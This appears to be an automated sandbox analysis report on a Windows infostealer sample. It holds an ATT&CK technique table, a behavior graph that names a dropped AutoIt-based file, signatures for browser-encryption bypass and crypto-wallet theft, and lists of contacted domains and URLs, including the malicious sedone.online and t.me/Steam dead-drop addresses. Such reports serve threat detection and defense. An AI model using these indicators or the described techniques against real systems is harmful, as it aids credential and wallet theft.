            Email AddressesDNS ServerDomain Accounts2
            Command and Scripting Interpreter            		1
            Registry Run Keys / Startup Folder            		1
            Extra Window Memory Injection            		2
            Obfuscated Files or Information            		Security Account Manager3
            File and Directory Discovery            		SMB/Windows Admin Shares21
            Input Capture            		1
            Remote Access Software            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		1
            DLL Side-Loading            		NTDS26
            System Information Discovery            		Distributed Component Object Model3
            Clipboard Data            		3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            Extra Window Memory Injection            		LSA Secrets1
            Query Registry            		SSHKeylogging14
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
            Process Injection            		121
            Masquerading            		Cached Domain Credentials221
            Security Software Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
            Registry Run Keys / Startup Folder            		2
            Valid Accounts            		DCSync1
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Virtualization/Sandbox Evasion            		Proc Filesystem4
            Process Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
            Access Token Manipulation            		/etc/passwd and /etc/shadow1
            Application Window Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
            Process Injection            		Network Sniffing1
            System Owner/User Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576056 Sample: nB52P46OJD.exe Startdate: 16/12/2024 Architecture: WINDOWS Score: 100 51 t.me 2->51 53 sedone.online 2->53 55 IuwKjpytGYqQ.IuwKjpytGYqQ 2->55 75 Suricata IDS alerts for network traffic 2->75 77 Found malware configuration 2->77 79 Antivirus detection for URL or domain 2->79 81 5 other signatures 2->81 10 nB52P46OJD.exe 24 2->10         started        12 msedge.exe 2->12         started        signatures3 process4 process5 14 cmd.exe 3 10->14         started        18 msedge.exe 12->18         started        21 msedge.exe 12->21         started        23 msedge.exe 12->23         started        dnsIp6 49 C:\Users\user\AppData\...\Participating.com, PE32 14->49 dropped 93 Drops PE files with a suspicious file extension 14->93 25 Participating.com 38 14->25         started        30 cmd.exe 2 14->30         started        32 conhost.exe 14->32         started        34 7 other processes 14->34 57 18.173.219.84, 443, 49815, 49837 MIT-GATEWAYSUS United States 18->57 59 20.110.205.119, 443, 49808, 49843 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 18->59 61 16 other IPs or domains 18->61 file7 signatures8 process9 dnsIp10 67 t.me 149.154.167.99, 443, 49712 TELEGRAMRU United Kingdom 25->67 69 sedone.online 116.203.12.114, 443, 49713, 49714 HETZNER-ASDE Germany 25->69 71 127.0.0.1 unknown unknown 25->71 47 C:\ProgramData\479RQ1NOHDJM\RIMOH4, PE32+ 25->47 dropped 85 Attempt to bypass Chrome Application-Bound Encryption 25->85 87 Found many strings related to Crypto-Wallets (likely being stolen) 25->87 89 Found API chain indicative of sandbox detection 25->89 91 4 other signatures 25->91 36 msedge.exe 2 11 25->36         started        39 chrome.exe 8 25->39         started        file11 signatures12 process13 dnsIp14 83 Monitors registry run keys for changes 36->83 42 msedge.exe 36->42         started        63 192.168.2.8, 138, 443, 49218 unknown unknown 39->63 65 239.255.255.250 unknown Reserved 39->65 44 chrome.exe 39->44         started        signatures15 process16 dnsIp17 73 www.google.com 142.250.181.68, 443, 49724, 49727 GOOGLEUS United States 44->73

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            nB52P46OJD.exe18%ReversingLabs

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\ProgramData\479RQ1NOHDJM\RIMOH40%ReversingLabs
            C:\Users\user\AppData\Local\Temp\615578\Participating.com0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://sedone.onlineIW4WT2ontent-Disposition:0%Avira URL Cloudsafe
            https://sedone.online100%Avira URL Cloudmalware
            https://sedone.onlineOHDJMContent-Disposition:0%Avira URL Cloudsafe
            https://sedone.online6FCB0%Avira URL Cloudsafe
            https://sedone.online58eafcad35nt-Disposition:0%Avira URL Cloudsafe
            https://sedone.online/2)100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            chrome.cloudflare-dns.com
            		172.64.41.3
            		truefalse
              		high
              t.me
              		149.154.167.99
              		truefalse
                		high
                ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                		94.245.104.56
                		truefalse
                  		high
                  sb.scorecardresearch.com
                  		18.165.220.57
                  		truefalse
                    		high
                    www.google.com
                    		142.250.181.68
                    		truefalse
                      		high
                      sedone.online
                      		116.203.12.114
                      		truefalse
                        		high
                        s-part-0035.t-0009.t-msedge.net
                        		13.107.246.63
                        		truefalse
                          		high
                          googlehosted.l.googleusercontent.com
                          		172.217.19.225
                          		truefalse
                            		high
                            clients2.googleusercontent.com
                            		unknown
                            		unknownfalse
                              		high
                              bzib.nelreports.net
                              		unknown
                              		unknownfalse
                                		high
                                assets.msn.com
                                		unknown
                                		unknownfalse
                                  		high
                                  IuwKjpytGYqQ.IuwKjpytGYqQ
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    ntp.msn.com
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734353246080&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                        		high
                                        https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734353252776&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                          		high
                                          https://assets.msn.com/statics/icons/favicon_newtabpage.pngfalse
                                            		high

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://duckduckgo.com/chrome_newtabParticipating.com, 0000000B.00000002.2649991672.0000000004DFC000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004CE2000.00000004.00000800.00020000.00000000.sdmp, MYU379.11.dr, Web Data.23.dr, DBAI5P.11.drfalse
                                              		high
                                              https://google-ohttp-relay-join.fastly-edge.com/)chrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/ac/?q=Participating.com, 0000000B.00000002.2649991672.0000000004DFC000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004CE2000.00000004.00000800.00020000.00000000.sdmp, MYU379.11.dr, Web Data.23.dr, DBAI5P.11.drfalse
                                                  		high
                                                  https://google-ohttp-relay-join.fastly-edge.com//chrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://permanently-removed.invalid/oauth2/v2/tokeninfomsedge.exe, 00000015.00000003.2153758878.000047B800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153952278.000047B80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153695423.000047B800264000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://google-ohttp-relay-join.fastly-edge.com/6chrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://anglebug.com/4633chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://anglebug.com/7382chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://issuetracker.google.com/284462263msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://google-ohttp-relay-join.fastly-edge.com/8chrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://deff.nelreports.net/api/report?cat=msnReporting and NEL.24.drfalse
                                                                  		high
                                                                  https://ntp.msn.cn/edge/ntp2cc80dabc69f58b6_1.23.drfalse
                                                                    		high
                                                                    https://google-ohttp-relay-join.fastly-edge.com/Achrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://google-ohttp-relay-join.fastly-edge.com/Gchrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://polymer.github.io/AUTHORS.txtchrome.exe, 00000011.00000003.2019573271.00006C7801170000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019158969.00006C7800700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018572062.00006C780106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019519827.00006C78003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018679546.00006C780107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019375269.00006C780100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019324643.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019623838.00006C780120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018760052.00006C7800FA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019098163.00006C7800C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018724142.00006C78010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018854218.00006C7801098000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://docs.google.com/chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drfalse
                                                                              		high
                                                                              https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.youtube.com3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drfalse
                                                                                  		high
                                                                                  https://google-ohttp-relay-join.fastly-edge.com/Jchrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://anglebug.com/7714chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.instagram.com3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drfalse
                                                                                        		high
                                                                                        https://google-ohttp-relay-join.fastly-edge.com/Hchrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://sedone.onlineIW4WT2ontent-Disposition:Participating.com, 0000000B.00000002.2640138284.00000000002E9000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://photos.google.com?referrer=CHROME_NTPchrome.exe, 00000011.00000003.2019573271.00006C7801170000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019519827.00006C78003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019623838.00006C780120C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://google-ohttp-relay-join.fastly-edge.com/Pchrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://google-ohttp-relay-join.fastly-edge.com/Wchrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://sedone.online58eafcad35nt-Disposition:Participating.com, 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://anglebug.com/6248chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://google-ohttp-relay-join.fastly-edge.com/Tchrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://ogs.google.com/widget/callout?eom=1chrome.exe, 00000011.00000003.2054032537.00006C7802BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054590983.00006C7802C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054252694.00006C780234C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2058221211.00006C780235C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054216422.00006C7802CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054114288.00006C7802CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054171670.00006C7802CA8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drfalse
                                                                                                        		high
                                                                                                        https://outlook.office.com/mail/compose?isExtension=true3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drfalse
                                                                                                          		high
                                                                                                          http://anglebug.com/6929chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://anglebug.com/5281chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://i.y.qq.com/n2/m/index.html3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drfalse
                                                                                                                		high
                                                                                                                https://www.deezer.com/3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drfalse
                                                                                                                  		high
                                                                                                                  https://google-ohttp-relay-join.fastly-edge.com/fchrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://issuetracker.google.com/255411748chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://web.telegram.org/3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drfalse
                                                                                                                        		high
                                                                                                                        https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 00000015.00000003.2153758878.000047B800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153952278.000047B80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153695423.000047B800264000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://anglebug.com/7246chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://anglebug.com/7369chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://anglebug.com/7489chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://duckduckgo.com/?q=chrome.exe, 00000011.00000003.2070923578.00006C7800BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://chrome.google.com/webstorechrome.exe, 00000011.00000003.2030954255.00006C7800C70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2197308191.000047B80017C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://cdnjs.cloudflare.com/ajax/libs/mathjax/service_worker_bin_prod.js.23.dr, offscreendocument_main.js.23.drfalse
                                                                                                                                      		high
                                                                                                                                      https://drive-daily-2.corp.google.com/chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drfalse
                                                                                                                                        		high
                                                                                                                                        http://polymer.github.io/PATENTS.txtchrome.exe, 00000011.00000003.2019573271.00006C7801170000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019158969.00006C7800700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018572062.00006C780106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019519827.00006C78003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018679546.00006C780107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019375269.00006C780100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019324643.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019623838.00006C780120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018760052.00006C7800FA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019098163.00006C7800C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018724142.00006C78010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018854218.00006C7801098000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Participating.com, 0000000B.00000002.2649991672.0000000004DFC000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004CE2000.00000004.00000800.00020000.00000000.sdmp, MYU379.11.dr, Web Data.23.dr, DBAI5P.11.drfalse
                                                                                                                                            		high
                                                                                                                                            http://www.autoitscript.com/autoit3/XParticipating.com, 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp, Pizza.0.dr, Participating.com.2.drfalse
                                                                                                                                              		high
                                                                                                                                              https://sedone.onlineOHDJMContent-Disposition:Participating.com, 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              https://issuetracker.google.com/161903006chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.Participating.com, 0000000B.00000002.2649991672.0000000005050000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004D2C000.00000004.00000800.00020000.00000000.sdmp, PH4O89.11.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://www.ecosia.org/newtab/Participating.com, 0000000B.00000002.2647629721.0000000004CE2000.00000004.00000800.00020000.00000000.sdmp, DBAI5P.11.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://drive-daily-1.corp.google.com/chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://excel.new?from=EdgeM365Shoreline3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://t.me/detct0rd0wntgMozilla/5.0Participating.com, 0000000B.00000002.2646862298.0000000004AD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://drive-daily-5.corp.google.com/chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://google-ohttp-relay-join.fastly-edge.com/lxchrome.exe, 00000011.00000003.2051212256.00006C7802660000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000015.00000003.2153758878.000047B800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153952278.000047B80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153695423.000047B800264000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://anglebug.com/3078chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://anglebug.com/7553chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://anglebug.com/5375chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://bzib.nelreports.net/api/report?cat=bingbusinessReporting and NEL.24.drfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000015.00000003.2153758878.000047B800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153952278.000047B80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153695423.000047B800264000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://anglebug.com/5371chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://anglebug.com/4722chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000015.00000003.2153758878.000047B800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153952278.000047B80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153695423.000047B800264000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://sedone.online6FCBParticipating.com, 0000000B.00000002.2640138284.00000000002E9000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                		unknown
                                                                                                                                                                                http://anglebug.com/7556chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://steamcommunity.com/profiles/76561199807592927d0wntgMozilla/5.0Participating.com, 0000000B.00000002.2646862298.0000000004AD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://chromewebstore.google.com/msedge.exe, 00000015.00000002.2197308191.000047B80017C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.23.drfalse
                                                                                                                                                                                      		high
